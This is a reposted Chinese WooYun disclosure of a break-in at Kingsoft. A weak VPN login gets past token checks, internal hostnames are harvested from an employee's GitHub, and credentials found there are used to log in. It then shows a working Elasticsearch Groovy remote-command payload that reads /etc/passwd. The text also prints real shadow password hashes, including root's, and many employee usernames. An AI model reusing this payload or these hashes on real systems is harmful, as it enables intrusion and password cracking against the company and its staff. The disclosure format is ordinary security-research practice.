神刀安全网

漏洞标题: 金山某处配置不当导致内部敏感信息泄露

漏洞详情

披露状态:

2016-03-30: 细节已通知厂商并且等待厂商处理中
2016-03-30: 厂商已经确认,细节仅向厂商公开
2016-04-09: 细节向核心白帽子及相关领域专家公开
2016-04-19: 细节向普通白帽子公开
2016-04-29: 细节向实习白帽子公开
2016-05-14: 细节向公众公开

简要描述:

还是提了吧,这个漏洞将不注重安全细节所导致的问题体现的淋漓尽致

详细说明:

WooYun: Juniper VPN 存在缺陷可绕过短信/token验证导致漫游内网 这个漏洞的延伸,里面提到了金山的弱口令,一直没有补,也是醉了,以为真的不能利用吗

访问

code 区域
https://ksvpn.kingsoft.com/dana-na/auth/url_2/welcome.cgi

绕过动态token限制

用户名密码:test [email protected]

成功登陆

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

词霸后台存在注入

但是貌似到这里好像就没有资源访问了,什么也做不了。

折腾了好久,发现可以入手的对方

code 区域
https://ksvpn.kingsoft.com/,DanaInfo=admin.comment.iciba.com+index.php?mod=index&zid=14%27

DanaInfo这个地方,貌似可以自定义填写url访问其他资源

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

访问www.iciba.com,成功访问,说明是可以访问的,但有些后台无法访问,但是也是个好消息。

why?

因为词霸后台外网无法访问,这个情况说明了厂商在在做安全防护时,列如nginx,肯定限制了一些外网ip,做了访问控制,但是这个VPN的ip肯定多少没被限制,可以访问一些内部资源和外网限制的后台。

这个时候,就需要请出github和域名破解工具了。因为github上面有大量的内部系统域名,员工认为我放在内网你怎么搞?域名破解工具可以列举出大量内部系统域名。

code 区域
https://github.com/wangxulin/portal_ops/blob/master/sites.json

果然搜索一会就搜索到了

code 区域
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c71c" }, "url" : "https://asset.ksops.com:8888", "image" : "zichanguanli_0317711111903.jpg", "tags" : [ "常用" ], "title" : "资产管理系统" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c71f" }, "url" : "http://101.251.206.18:9080/nfsen/nfsen.php", "image" : "机房流量分析系统_930231053123.jpg", "tags" : [ "常用" ], "title" : "各机房流量分析" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c720" }, "url" : "http://zabbix.liebaopay.com:9080/zabbix/dashboard.php", "image" : "zabbix_0823007701585.jpg", "tags" : [ "AWS", "IDC" ], "title" : "海外zabbix监控" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c727" }, "url" : "http://manage.123.ksops.com", "image" : "mange_743232030279.jpg", "tags" : [ "设置" ], "title" : "运维导航设置" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c728" }, "url" : "http://101.251.206.18:9080/nfsen/nfsen.php", "image" : "sflow-cp_670216633966.png", "title" : "sFlow流量分析,带宽尽收眼底", "tags" : [ "IDC" ] }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c729" }, "url" : "https://mail.google.com/a/conew.com/#inbox", "image" : "猎豹邮箱_196094978248.jpg", "tags" : [ "常用", "Hadoop" ], "title" : "猎豹移动Gmail邮箱" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c72a" }, "url" : "http://cm-hdfs1.kisops.com/", "image" : "hadoop_cmbei_603931709815.jpg", "tags" : [ "Hadoop" ], "title" : "cm云端hadoop-namenode(备)" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c72b" }, "url" : "http://cm-ganglia.kisops.com/ganglia/", "image" : "ganglia_871794981794.jpg", "tags" : [ "Hadoop" ], "title" : "cm云端hadoop-ganglia监控" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c72c" }, "url" : "http://cm-hue.kisops.com/", "image" : "hue_710315595784.jpg", "tags" : [ "Hadoop" ], "title" : "cm云端hadoop-hue服务" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c72d" }, "url" : "http://cm-yarn.kisops.com/", "image" : "yarn-logo_812569348626.jpeg", "title" : "cm云端hadoop-yarn任务情况", "tags" : [ "Hadoop" ] }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c72f" }, "url" : "https://redmine.liebaopay.com", "image" : "yunweikaifa_636983685023.jpg", "tags" : [ "运维开发" ], "title" : "项目管理(运维)" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c730" }, "url" : "https://ksso.ksops.com/", "image" : "renzhengxitong_714780598041.jpg", "tags" : [ "运维开发" ], "title" : "统一帐号系统" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c731" }, "url" : "http://yum.kisops.com:9080/", "image" : "YUM仓库_943248215524.jpg", "tags" : [ "常用", "国内应用" ], "title" : "CentOS软件仓库" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c732" }, "url" : "http://mysql.kisops.com", "image" : "mysql_129863569319.jpg", "tags" : [ "国内应用" ], "title" : "Mysql管理系统" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c733" }, "url" : "http://nagios.ksops.com", "image" : "nagios_218820339813.jpg", "tags" : [ "国内应用" ], "title" : "国内Nagios监控" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c734" }, "url" : "http://zbx.kisops.com:9080", "image" : "zabbix_712899286473.jpg", "tags" : [ "国内应用" ], "title" : "国内Zabbix" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c735" }, "url" : "http://webserver.kisops.com:9000", "image" : "webserverguanli_687103452913.jpg", "tags" : [ "国内应用" ], "title" : "WebServer管理系统" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c736" }, "url" : "http://ping.chinaz.com", "image" : "ping_584364505954.jpg", "tags" : [ "国内应用" ], "title" : "国内ping检测" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c737" }, "url" : "http://10.33.21.209/login_face.php", "image" : "webserverguanlijiuban_630611870292.jpg", "tags" : [ "国内应用" ], "title" : "旧版发布系统" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c739" }, "url" : "https://cmcm.signin.aws.amazon.com/console", "image" : "main_0721562194586.jpg", "tags" : [ "AWS" ], "title" : "AWS猎豹主帐号 管理后台 [331956261250]" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c73a" }, "url" : "https://cheetahmobile.signin.aws.amazon.com/console", "image" : "cm_312563148541.jpg", "tags" : [ "AWS" ], "title" : "AWS猎豹帐单帐号 管理后台 [763742035320]" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c73b" }, "url" : "https://cmcm-samsung.signin.aws.amazon.com/console", "image" : "samsung_331511074509.jpg", "tags" : [ "AWS" ], "title" : "AWS三星帐号 管理后台 [613901281826]" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c73c" }, "url" : "https://cmcm.signin.amazonaws.cn/console", "image" : "china_974611629566.jpg", "tags" : [ "AWS" ], "title" : "AWS猎豹中国区帐号 管理后台 [025129320935]" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c73d" }, "url" : "http://ksmgr.liebaopay.com/kscrm/insapply", "image" : "资源申请_152063428036.jpg", "tags" : [ "AWS" ], "title" : "AWS资源申请" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c73e" }, "url" : "http://ksmgr.liebaopay.com/", "image" : "海外资产_432795565994.jpg", "tags" : [ "AWS" ], "title" : "海外资产管理系统" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c73f" }, "url" : "http://calculator.s3.amazonaws.com/index.html?lng=zh_CN", "image" : "计算成本_900324688894.jpg", "tags" : [ "AWS" ], "title" : "AWS费用计算器" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c740" }, "url" : "http://jenkins.liebaopay.com", "image" : "jenkins_702551163853.jpg", "tags" : [ "AWS" ], "title" : "Jenkins-代码发布" }
{ "_id" : { "$oid" : "54d0e6acbe0320ea13a3c741" }, "url" : "http://wiki.liebaopay.com/pages/viewpage.action?pageId=1245580", "image" : "wiki_220173137798.jpg", "tags" : [ "AWS" ], "title" : "AWS 文档 专栏" }
{ "_id" : { "$oid" : "54d2de23ae35842e2ae8975e" }, "url" : "http://cdn.kisops.com:8080/", "image" : "cdnpingtai_786370583853.jpg", "tags" : [ "CDN" ], "title" : "CDN管理系统" }
{ "_id" : { "$oid" : "54d31e20ae358442b5242644" }, "url" : "https://ksso.ksops.com/", "image" : "kingsoftsinglesignon_315977102352.jpg", "tags" : [ "SCM", "配置管理工具" ], "title" : "配置管理平台" }
{ "_id" : { "$oid" : "54d31ea3ae358442b5242645" }, "url" : "http://scm.rdev.kingsoft.net/hudson", "image" : "jenkins_110402474171.jpg", "tags" : [ "SCM", "配置管理工具" ], "title" : "hudson" }
{ "_id" : { "$oid" : "54d9a852ae3584796adf574c" }, "url" : "http://lvs.kisops.com:9080/charts/", "image" : "lvsguanli_351549072919.jpg", "tags" : [ "常用" ], "title" : "LVS统一管理系统" }
{ "_id" : { "$oid" : "54d9a869ae3584796adf574d" }, "url" : "http://wiki.liebaopay.com/", "image" : "运维维基_580167773956.jpg", "tags" : [ "常用" ], "title" : "运维文档" }
{ "_id" : { "$oid" : "54d9a888ae3584796adf574e" }, "url" : "http://elk.kisops.com/#/dashboard/elasticsearch/MySQL", "image" : "MySQL慢日志_537866537336.jpg", "tags" : [ "常用" ], "title" : "MySQL慢日志" }
{ "_id" : { "$oid" : "54d9a89cae3584796adf574f" }, "url" : "http://gongdan.kisops.com:9020/", "image" : "gongdanxitong_532709091512.jpg", "tags" : [ "常用" ], "title" : "运维工单流程" }
{ "_id" : { "$oid" : "54d9a8b6ae3584796adf5750" }, "url" : "http://realtime.ksops.com/", "image" : "实时展现_452013724696.jpg", "tags" : [ "常用" ], "title" : "统一日志收集与实时展现" }
{ "_id" : { "$oid" : "54d9a92eae3584796adf5751" }, "url" : "http://zbx.kisops.com:9080/", "image" : "国内Zabbix监控_457656325063.jpg", "tags" : [ "常用", "IDC" ], "title" : "国内Zabbix监控" }
{ "_id" : { "$oid" : "54dd69f2ae3584796adf5753" }, "url" : "http://www.alibench.com/", "image" : "ailiceshi_462577100128.jpg", "tags" : [ "CDN" ], "title" : "阿里测试" }
{ "_id" : { "$oid" : "54dd6a0fae3584796adf5754" }, "url" : "http://tools.fastweb.com.cn/", "image" : "kuaiwangcdnceshi_550901716589.jpg", "tags" : [ "CDN" ], "title" : "快网dns测试" }
{ "_id" : { "$oid" : "54dd959dae3584796adf5755" }, "url" : "http://cacti.kisops.com:9080/index.php", "image" : "cacti_449047750559.jpg", "tags" : [ "IDC" ], "title" : "CACTI" }
{ "_id" : { "$oid" : "54dda176ae3584796adf5756" }, "url" : "http://zw-virtmgr.kisops.com", "image" : "kvmzhaowei_618056190702.jpg", "tags" : [ "IDC" ], "title" : "KVM 兆维" }
{ "_id" : { "$oid" : "54dda1cdae3584796adf5757" }, "url" : "http://wx-virtmgr.kisops.com", "image" : "kvmwuxi_101097698306.jpg", "tags" : [ "IDC" ], "title" : "KVM 无锡" }
{ "_id" : { "$oid" : "54dda203ae3584796adf5758" }, "url" : "http://dg-virtmgr.kisops.com", "image" : "kvmdongguan_29844798344.jpg", "tags" : [ "IDC" ], "title" : "KVM 东莞" }
{ "_id" : { "$oid" : "54efd5cdae358426fba915bc" }, "url" : "https://dg-proxy.kisops.com:9019", "image" : "isilon_dongguan_965136321624.jpg", "tags" : [ "IDC" ], "title" : "isilon无锡" }
{ "_id" : { "$oid" : "54f558a5ae358426fba915bd" }, "url" : "https://cmcm-gametoa.signin.aws.amazon.com/console", "image" : "game_670178334077.jpg", "tags" : [ "AWS" ], "title" : "AWS游戏帐号 管理后台 [305224330426]" }
{ "_id" : { "$oid" : "54f55d43ae358426fba915be" }, "url" : "http://weibo.com/qihaipeng", "image" : "QQ图片20150303151439_634022105812.jpg", "tags" : [ "AWS" ], "title" : "围脖求互粉" }

大量的内部系统域名

然后就用kisops.com这个内部域名来进行外网爆破,然后尝试访问

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

成功访问了一些资源

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

code 区域
机房流量管理系统http://101.251.206.18:9080/nfsen/nfsen.php

外网无法访问,vpn内可以访问,需要密码。

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

就地取材

code 区域
https://github.com/wangxulin/cmz/blob/9fc0715e999cec23b92f310cd504c44a4e4b205e/app/memcached/forms.py

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

在github上看到一个,感觉可以用,试试,成功登陆

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

也是醉了,敢不敢什么都朝github上面传

webserver管理

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

自动安装系统

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

elasticsearch数据平台

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

补丁没打,直接命令执行

漏洞标题:  金山某处配置不当导致内部敏感信息泄露

code 区域
GET /,DanaInfo=elasticsearch.kisops.com,Port=9200+_search?pretty HTTP/1.1
Host: ksvpn.kingsoft.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: DSSignInURL=/; DSFirstAccess=1459265428; DSCK:iciba_suggest_power=1%3B%20%20expires%3DWed%2C%2029%20Mar%202017%2015%3A50%3A55%20GMTundefined%3B%20%20path%3D/%3B%20%20domain%3Dwww.iciba.com%3B%20; DSCK:CNZZDATA5816172=cnzz_eid%253D200427511-1459263058-%2526ntime%253D1459263058%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A01%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dcp.cmcm.com%3B%20; DSCK:_cnzz_CV=%3B%20%20expires%3DThu%2C%2001%20Jan%201970%2000%3A00%3A00%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:CNZZDATA4043849=cnzz_eid%253D570930719-1459257264-http%25253A%25252F%25252Fbjdnserror1.wo.com.cn%25253A8080%25252F%2526ntime%253D1459262939%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A02%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:Hm_lvt_5ac0d8ae079c0cc365232a92e683cd42=1459262371%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20%20path%3D/%3B%20%20expires%3DWed%2C%2029%20Mar%202017%2015%3A58%3A02%20GMT%3B%20; DSCK:/:DSPT:Hm_lpvt_5ac0d8ae079c0cc365232a92e683cd42=1459267083%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20%20path%3D/%3B%20; DSCK:/:DSPT:_cnzz_CV=%3B%20%20expires%3DThu%2C%2001%20Jan%201970%2000%3A00%3A00%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSCK:/:DSPT:CNZZDATA1535626=cnzz_eid%253D1460670884-1459259525-http%25253A%25252F%25252Fbjdnserror1.wo.com.cn%25253A8080%25252F%2526ntime%253D1459264925%3B%20%20expires%3DTue%2C%2027%20Sep%202016%2015%3A58%3A02%20GMT%3B%20%20path%3D/%3B%20%20domain%3Dbjdnserror1.wo.com.cn%3B%20; DSID=42fe302e7ee039b6fd97eb0c1b3b2607; DSLastAccess=1459267992
Content-Length: 410

{"size":1,"script_fields": {"iswin": {"script":"java.lang.Math.class.forName(/"java.io.BufferedReader/").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(/"java.io.InputStreamReader/").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(/"java.lang.Runtime/").getRuntime().exec(/"cat /etc/passwd/").getInputStream())).readLines()","lang": "groovy"}}}

code 区域
HTTP/1.1 200 OK
Content-Type: application/json; charset=UTF-8
Content-Disposition: filename="_search"
Access-Control-Allow-Origin: *
Cache-Control: No-Store
Set-Cookie: DSLastAccess=1459268097; path=/; Secure
Connection: Keep-Alive
Keep-Alive: timeout=15
Content-Length: 3466

{
"took" : 4,
"timed_out" : false,
"_shards" : {
"total" : 5,
"successful" : 5,
"failed" : 0
},
"hits" : {
"total" : 11,
"max_score" : 1.0,
"hits" : [ {
"_index" : "grafana-dash",
"_type" : "dashboard",
"_id" : "zwtenginecloudgraph",
"_score" : 1.0,
"fields" : {
"iswin" : [ [ "root:x:0:0:root:/root:/bin/bash", "bin:x:1:1:bin:/bin:/sbin/nologin", "daemon:x:2:2:daemon:/sbin:/sbin/nologin", "adm:x:3:4:adm:/var/adm:/sbin/nologin", "lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin", "sync:x:5:0:sync:/sbin:/bin/sync", "shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown", "halt:x:7:0:halt:/sbin:/sbin/halt", "mail:x:8:12:mail:/var/spool/mail:/sbin/nologin", "uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin", "operator:x:11:0:operator:/root:/sbin/nologin", "games:x:12:100:games:/usr/games:/sbin/nologin", "gopher:x:13:30:gopher:/var/gopher:/sbin/nologin", "ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin", "nobody:x:99:99:Nobody:/:/sbin/nologin", "dbus:x:81:81:System message bus:/:/sbin/nologin", "vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin", "saslauth:x:499:76:/"Saslauthd user/":/var/empty/saslauth:/sbin/nologin", "postfix:x:89:89::/var/spool/postfix:/sbin/nologin", "haldaemon:x:68:68:HAL daemon:/:/sbin/nologin", "sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin", "ntp:x:38:38::/etc/ntp:/sbin/nologin", "tcpdump:x:72:72::/:/sbin/nologin", "www:x:80:80::/home/www:/sbin/nologin", "chenjian:x:500:500::/home/chenjian:/bin/bash", "cuipeng:x:502:502::/home/cuipeng:/bin/bash", "lijianhui:x:509:509::/home/lijianhui:/bin/bash", "lilongwei:x:510:510::/home/lilongwei:/bin/bash", "liuwang:x:511:511::/home/liuwang:/bin/bash", "luhuiyong:x:513:513::/home/luhuiyong:/bin/bash", "wangyan:x:515:515::/home/wangyan:/bin/bash", "zhaohaijun:x:517:517::/home/zhaohaijun:/bin/bash", "zhaoyiding:x:519:519::/home/zhaoyiding:/bin/bash", "zhengwei:x:520:520::/home/zhengwei:/bin/bash", "liujian:x:522:522::/home/liujian:/bin/bash", "mongodb:x:184:498:MongoDB Database Server:/var/lib/mongodb:/sbin/nologin", "wangxulin:x:524:524::/home/wangxulin:/bin/bash", "apache:x:48:48:Apache:/var/www:/sbin/nologin", "ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin", "zhanglei5:x:525:525::/home/zhanglei5:/bin/bash", "redis:x:498:497:Redis Server:/var/lib/redis:/sbin/nologin", "wanglinlin:x:527:527::/home/wanglinlin:/bin/bash", "memcached:x:497:496:Memcached daemon:/var/run/memcached:/sbin/nologin", "mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash", "renwenjie:x:529:529::/home/renwenjie:/bin/bash", "wanglinlin1:x:531:531::/home/wanglinlin1:/bin/bash", "zhengwei1:x:532:532::/home/zhengwei1:/bin/bash", "ansible:x:533:533::/home/ansible:/bin/bash", "zabbix:x:496:495:zabbix user:/var/lib/zabbix:/sbin/nologin", "duxinrui:x:534:534::/home/duxinrui:/bin/bash", "wangchao3:x:535:535::/home/wangchao3:/bin/bash", "jiangzhiwu:x:536:536::/home/jiangzhiwu:/bin/bash", "user_ansible:x:537:537::/home/user_ansible:/bin/bash", "liuweiliang:x:538:538::/home/liuweiliang:/bin/bash", "wengyisheng:x:539:539::/home/wengyisheng:/bin/bash", "yuhansong:x:540:540::/home/yuhansong:/bin/bash", "wangyuezu:x:541:541::/home/wangyuezu:/bin/bash", "qiuwenhui:x:542:542::/home/qiuwenhui:/bin/bash", "lihaitao:x:543:543::/home/lihaitao:/bin/bash", "aowen:x:544:544::/home/aowen:/bin/bash", "lihongzhi:x:545:545::/home/lihongzhi:/bin/bash", "shaoke:x:546:546::/home/shaoke:/bin/bash" ] ]
}
} ]
}
}

shadow可读

code 区域
root:$1$2f8HwpQn$twTRUHxPt4jLCLpdtrn8c0:16247:0:99999:7:::", "bin:*:15980:0:99999:7:::", "daemon:*:15980:0:99999:7:::", "adm:*:15980:0:99999:7:::", "lp:*:15980:0:99999:7:::", "sync:*:15980:0:99999:7:::", "shutdown:*:15980:0:99999:7:::", "halt:*:15980:0:99999:7:::", "mail:*:15980:0:99999:7:::", "uucp:*:15980:0:99999:7:::", "operator:*:15980:0:99999:7:::", "games:*:15980:0:99999:7:::", "gopher:*:15980:0:99999:7:::", "ftp:*:15980:0:99999:7:::", "nobody:*:15980:0:99999:7:::", "dbus:!!:16247::::::", "vcsa:!!:16247::::::", "saslauth:!!:16247::::::", "postfix:!!:16247::::::", "haldaemon:!!:16247::::::", "sshd:!!:16247::::::", "ntp:!!:16247::::::", "tcpdump:!!:16247::::::", "www:!!:16247:0:99999:7:::", "chenjian:$6$4LxYI06oJy$RMQ6p.SPLxAogX13dEyx7hq5kRQRHqetTfd1ya5u8n4/ZjWUWFV7mzdcCmlJfkBWDEVRk.7K7yOpx68HavFiU0:16888:0:99999:7:::", "cuipeng:$6$RlVoZXVLmF/$Aq/tlBO7y7vyzwJYufXIYgAiKZ6tW6wa2mtyAf0fN2/7iEXIdl6K1oNHqqJT2fb0MPugoc9saMEyh1TwayWxv0:16888:0:99999:7:::", "lijianhui:$6$CaYDs/BqK7h/N$KbItTPT/5RL1rQ07kqeYvy5.iUsw4ob.I3AL49P3yH9BQHOVa2jD2QZXpIdvFxe/bIKPWqHVCwQ6H5rbDYluH1:16888:0:99999:7:::", "lilongwei:$6$6BSNt/Qo$iY9zhsfOm1Oib7GpHxlN5g8bfkitNPRM1t1lMBT8Rdo1VR75hDfcjQvGnvRsrwyyGgHndSnhR6YA7YoS/0Ncv1:16888:0:99999:7:::", "liuwang:$6$.b7C2/tVpGnliJ$3iFt8qk207Is6h1L9IZ.hnVZO9EHqTWumAWgW682sVMmb/8Fi/F55t88ve.zE5DDPlXHDUiyTsX6dzeC6jLIB.:16888:0:99999:7:::", "luhuiyong:$6$HLIuZReIsB$q.t02VDSJw7bsiPNu5WFlPb9iiZrzsFze1LI9B7M6FMWxtvrMswJtjwiUuEwmPTJ9kS5HJgfqE63MvXdp9sbS0:16888:0:99999:7:::", "wangyan:$6$Wtff3/0l$ThB977Bo8nkgTblA8Tz/67kCflUla7Ubq6S07QAocLXpIEF3PyGlJF1O33HHQ8ORkNb4mTP.xbXSf.UP3Lc6C/:16888:0:99999:7:::", "zhaohaijun:$6$dpVD9vZ4HSbPtVh$ICEXxr51clg2MeLwaIwFh1iaIAO8MHCHBXM0zZJUcSF1fhQTye7wsKrK7oPocCw6Sc6BrgOvovmR4SagguQiA1:16888:0:99999:7:::", "zhaoyiding:$6$v1QOfHPNlY$DiCFmlnTBiU/pLYLKyqJVTnqG6WLR6qe03i9/hW.O7iY1fEYCAHEWyxDtdjs0m1Z6rLOV61sCC34/Kce2WcTP.:16888:0:99999:7:::", "zhengwei:$6$q9krW/tRlE$UaYsIjcsOQSGcvsHEnbKxazb3KjUSozPbqStf1V84dMDIOEKS.F1ekbrDs.hgz0d.heDCpxVhogu0itbAjkIw0:16430:0:99999:7:::", "liujian:$6$dONMM/XSqlf/d$6B6YbVAXBYdMKJEXMcyItujTTyJ9CG.gdubiJIE6wohMeLtO6giLpS87igvRtkkSthfIhB0im5f6AU9pojepO1:16888:0:99999:7:::", "mongodb:!!:16261::::::", "wangxulin:$6$ZUfLD/ZK44d6bP$20miPyVEOiq7Zy2U8xHjJY1pK5TfnVrB20q9Uh1A6f2MKyJANVoaYRKXcNh/mQ8GA3rssD6zzNHd/ldGJw8wb0:16611:0:99999:7:::", "apache:!!:16281::::::", "ldap:!!:16289::::::", "zhanglei5:$6$LFxbl/DTRl$Mb.SH.QBf9AXpNkYyXgRbdVgtCRbLZioP2s0fmKBOnplVDnFDdQc9QpftbdAjdSAL4cPj/DQMpCcttl2KP6I31:16509:0:99999:7:::", "redis:!!:16331::::::", "wanglinlin:$6$GokAnvob$vgXK1.B5Wjhq.jFGVorbMQ.8OhJpGlwB/wqWIsOYpPPQCNIC9kpbQiDg5nPxIOwGCbcPbhCH12KfauBnGSYE40:16429:0:99999:7:::", "memcached:!!:16358::::::", "mysql:!!:16358::::::", "renwenjie:$6$2D49PP7ayPtmi/$aGx4pljOx2p.sEOld54hImyvSzFs.hUKOQL6RdfRQik8QJZu3yZdytZvl3smGEl2ey9KivVs4ZinZ3a99jTvl.:16888:0:99999:7:::", "wanglinlin1:$6$D.65A/kTYXF/KL$seMdaK1tu5NiWJSPwc64/oMb5kLrQg5DI5bWqSFI0OgL3yjVPpgsfOAKMTiEzRmb0goskSxKevBhvngvCpKM30:16888:0:99999:7:::", "zhengwei1:$6$whait/Zike/$cAz/BD.N5.vhdYujWnaarNF6OQKXzCzy49P7GOEDJX86.sgyuw.JE/0GVucZjccPJM7b/XdTA9Po5VVBtNXBl0:16888:0:99999:7:::", "ansible:$6$L..22BGLGNo$Gyq58UMNCw.VBMmKygukv.zHYOP3M0ZPQWEdRzSDgSTRRFISCv7ACBdrXHbWeZypueMusQp2uTdjr7mQWDr1I1:16888:0:99999:7:::", "zabbix:!!:16511::::::", "duxinrui:$6$A4v7TKiVHZCZ$cmPry/GU2JMhLUR9FzO7aMbvI9lCMHJgvdktFxiDC5q77EcWzClKErHbn7eJBLu92sXlTLwYcMncjIRkQ/oLN1:16888:0:99999:7:::", "wangchao3:$6$fZ40I/ev2J2R6.E$W.eXVixmdY2dBT/DXROMPqQqdM6Jmp50M6.LO5Xx9Hg8MNWJip.H/KpAqfSQ4zvfN8ywr.7GkKYVrPWKBWoSU0:16888:0:99999:7:::", "jiangzhiwu:$6$/Le4vqLj/w$86QJkjoPPD2QSY7Eos8PMsffeJWPBBeK8OdHjdXhGsKX/pa8FJwVEbcRFRriZhmxzHahN/mnWxmdAFUhB6aOR0:16888:0:99999:7:::", "user_ansible:$6$K6BIx//zvDX/c$EB79vJS2n2tYY2td.44Vn1DqYBng/KqZrqLS2Ase29/fZqUhO4QWKcKy0UDTye7tVgZnZPM1noI3Ko1tjBj.Z0:16888:0:99999:7:::", "liuweiliang:$6$V4cQs7upfc$e3th.87MwW2TX7b81Rr8oaLCHvZZW3A0Z3AkV95LCn8/8pd7VIX.FaRwJsww3NdpL5Bd8.aXPid.A3ya3qPTf1:16888:0:99999:7:::", "wengyisheng:$6$Zl5X2/i6dx8/mfZ$YhuYtboITIg4AJA7nkOUMd6wga7RGmdw6mX9ApTLIiOfz5HT6vmTURFaZ4Pnjrtp.hLnPfO8X.z3c/KuZoSU91:16888:0:99999:7:::", "yuhansong:$6$3PGPsnMfxp/zEOat$bKKXpHKOjl7nvOBrgD94QAOItykp434nqj0VelS71aP4aiN7Bs6pV5J6P8tjnw3ccygtVUdZlsnzi3Jju0EiC/:16888:0:99999:7:::", "wangyuezu:$6$JjDPymAjo$ZlH2u6f0GrOxvsWZWnSBRtJ7L8Z8Ym0vaFTR7/mzN.E5RohrmA6nHx8ukLMmgGsZ567SiH0B58fUCOmaTDNS10:16888:0:99999:7:::", "qiuwenhui:$6$6er7U/2dpj1c$6gnMQcAp.G5EVOG7zoBtBtPbVWOYWXOduZetbQhYIllISwvs.ANXkR9VNS2BcQtB29BdQGEHf/xS1cGPAIt0Q.:16869:0:99999:7:::", "lihaitao:$6$HTI6d/XAEHC/lF$6AP4Pa/Pf.w7aDtdrJEZRgHtf/5RLn..dPSPxc9OfnMR9.2EBPH94OS.14q45U7N0VcOSzXfjJ93nA6E8ysjI/:16888:0:99999:7:::", "aowen:$6$RiMWE/uz9zcgXqpx$5waAY4a5pfknRSX9Hsqu0tioBIdqJDJwvk.1KrzvVarXvGr08RQ66v8/nnNz5NPCkcbb9pYMpwDqB8VRkasV90:16888:0:99999:7:::", "lihongzhi:$6$tePUy/vhspI/$F8ff6CyiOfHFO2iYpo6RvldZgA2bgWzN7u6XeWX7biPwYiajYaWrPK3qvlCWdyccS1WOywqpM4nUd/GyiXbwl1:16888:0:99999:7:::", "shaoke:$6$8cIFqjMits/5QJg$nyP.4rlxiO/9H6Iajaw1pllP5W.pHFLGWc.aGebesb7E7d4JB/2lPi.cIN0hbdyEawDJocUQmu6898G6dK.h30:16888:0:99999:7:::

漏洞证明:

code 区域
GET /,DanaInfo=elasticsearch.kisops.com,Port=9200+_search?pretty HTTP/1.1
Host: ksvpn.kingsoft.com
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
